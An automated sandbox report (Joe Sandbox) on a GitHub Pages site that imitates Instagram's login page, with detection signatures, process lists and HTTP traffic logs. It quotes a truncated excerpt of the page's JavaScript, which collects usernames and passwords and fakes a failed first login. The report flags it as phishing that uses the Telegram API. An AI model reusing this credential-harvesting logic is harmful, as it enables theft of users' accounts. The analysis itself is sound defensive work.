Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://sayidanur.github.io/instagram.com

Overview

General Information

Sample URL:https://sayidanur.github.io/instagram.com
Analysis ID:1521987
Tags:openphish
Infos:

Detection

HTMLPhisher
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected HtmlPhish64
Javascript uses Telegram API
Phishing site detected (based on logo match)
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL

Classification

  • System is w10x64
  • chrome.exe (PID: 2124 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2992 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2024,i,16093158522379746750,9946414050435880750,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6412 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5608 --field-trial-handle=2024,i,16093158522379746750,9946414050435880750,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6332 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://sayidanur.github.io/instagram.com" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
1.0.pages.csvJoeSecurity_HtmlPhish_64Yara detected HtmlPhish_64Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://sayidanur.github.io/instagram.comSlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

    Phishing

    barindex
    Source: Yara matchFile source: 1.0.pages.csv, type: HTML
    Source: https://sayidanur.github.io/instagram.com/main.jsHTTP Parser: document.addeventlistener('domcontentloaded', () => { const form = document.getelementbyid('telegramform'); const loading = document.getelementbyid('loading'); const validtext = document.queryselector(".invalid") let trycount = 0; // form.addeventlistener('submit', function(e) { e.preventdefault(); const username = document.getelementbyid('username'); const password = document.getelementbyid('password'); // invalid-input, username.classlist.remove('invalid-input'); password.classlist.remove('invalid-input'); if (trycount === 0) { // , username.classlist.add('invalid-input'); password.classlist.add('invalid-input'); validtext.style.display = 'block'; username.value = ''; password.value = ''; ...
    Source: https://sayidanur.github.io/instagram.com/Matcher: Template: instagram matched
    Source: https://sayidanur.github.io/instagram.com/HTTP Parser: Number of links: 0
    Source: https://sayidanur.github.io/instagram.com/HTTP Parser: <input type="password" .../> found but no <form action="...
    Source: https://www.facebook.com/pages/create/?ref_type=registration_formHTTP Parser: Base64 decoded: {"w":1280,"h":1024,"aw":1280,"ah":984,"c":24}
    Source: https://sayidanur.github.io/instagram.com/HTTP Parser: Title: Instagram does not match URL
    Source: https://sayidanur.github.io/instagram.com/HTTP Parser: <input type="password" .../> found
    Source: https://www.facebook.com/?locale=ru_RUHTTP Parser: <input type="password" .../> found
    Source: https://www.facebook.com/pages/create/?ref_type=registration_formHTTP Parser: <input type="password" .../> found
    Source: https://apps.apple.com/uz/app/instagram/id389801252HTTP Parser: No favicon
    Source: https://apps.apple.com/uz/app/instagram/id389801252HTTP Parser: No favicon
    Source: https://apps.apple.com/uz/app/instagram/id389801252HTTP Parser: No favicon
    Source: https://apps.apple.com/uz/app/instagram/id389801252HTTP Parser: No favicon
    Source: https://apps.apple.com/uz/app/instagram/id389801252HTTP Parser: No favicon
    Source: https://sayidanur.github.io/instagram.com/HTTP Parser: No <meta name="author".. found
    Source: https://www.facebook.com/?locale=ru_RUHTTP Parser: No <meta name="author".. found
    Source: https://www.facebook.com/?locale=ru_RUHTTP Parser: No <meta name="author".. found
    Source: https://www.facebook.com/pages/create/?ref_type=registration_formHTTP Parser: No <meta name="author".. found
    Source: https://www.facebook.com/pages/create/?ref_type=registration_formHTTP Parser: No <meta name="author".. found
    Source: https://sayidanur.github.io/instagram.com/HTTP Parser: No <meta name="copyright".. found
    Source: https://www.facebook.com/?locale=ru_RUHTTP Parser: No <meta name="copyright".. found
    Source: https://www.facebook.com/?locale=ru_RUHTTP Parser: No <meta name="copyright".. found
    Source: https://www.facebook.com/pages/create/?ref_type=registration_formHTTP Parser: No <meta name="copyright".. found
    Source: https://www.facebook.com/pages/create/?ref_type=registration_formHTTP Parser: No <meta name="copyright".. found
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49755 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49757 version: TLS 1.2
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
    Source: unknownTCP traffic detected without corresponding DNS query: 93.184.221.240
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /instagram.com HTTP/1.1Host: sayidanur.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /instagram.com/ HTTP/1.1Host: sayidanur.github.ioConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /instagram.com/styles.css HTTP/1.1Host: sayidanur.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://sayidanur.github.io/instagram.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /instagram.com/main.js HTTP/1.1Host: sayidanur.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sayidanur.github.io/instagram.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /instagram.com/img//instagram-logo.png HTTP/1.1Host: sayidanur.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sayidanur.github.io/instagram.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.5.2/css/all.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://sayidanur.github.iosec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /instagram.com/img/apple-button.png HTTP/1.1Host: sayidanur.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sayidanur.github.io/instagram.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /instagram.com/img/googleplay-button.png HTTP/1.1Host: sayidanur.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sayidanur.github.io/instagram.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /instagram.com/main.js HTTP/1.1Host: sayidanur.github.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /instagram.com/img//instagram-logo.png HTTP/1.1Host: sayidanur.github.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /instagram.com/img/apple-button.png HTTP/1.1Host: sayidanur.github.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.5.2/webfonts/fa-brands-400.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://sayidanur.github.iosec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /instagram.com/img/googleplay-button.png HTTP/1.1Host: sayidanur.github.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /instagram.com/img/insta-fav.ico HTTP/1.1Host: sayidanur.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://sayidanur.github.io/instagram.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /instagram.com/img/insta-fav.ico HTTP/1.1Host: sayidanur.github.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
    Source: global trafficHTTP traffic detected: GET /?locale=ru_RU HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yG/l/0,cross/sz9JnoPJuhF.css HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yy/l/0,cross/_PStGDb9Db2.css HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yb/l/0,cross/fo219H1KM4T.css HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yX/l/0,cross/cac49QtG2Ld.css HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yM/l/0,cross/8K9cI3nQr0j.css HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y1/r/s1oFVSwofs5.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/y1/r/4lCu2zih0ca.svg HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y6/r/a2il9m3oo2U.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3i6l24/yP/l/ru_RU/GcN06huceZG.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yU/r/O7nelmd9XSI.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://static.xx.fbcdn.net/rsrc.php/v3/yb/l/0,cross/fo219H1KM4T.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /security/hsts-pixel.gif HTTP/1.1Host: facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0EP1BYCUXVNSi8ERK..Bm-N13..AAA.0.0.Bm-N13.AWXfEaJCEFA; sb=d934Zki5Wi7DXL1gbpG7s1V5
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/y-/r/v87V0xuYr4I.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/ys/r/4zS6aBDBtHT.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yr/r/OJuPnvrkEfZ.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
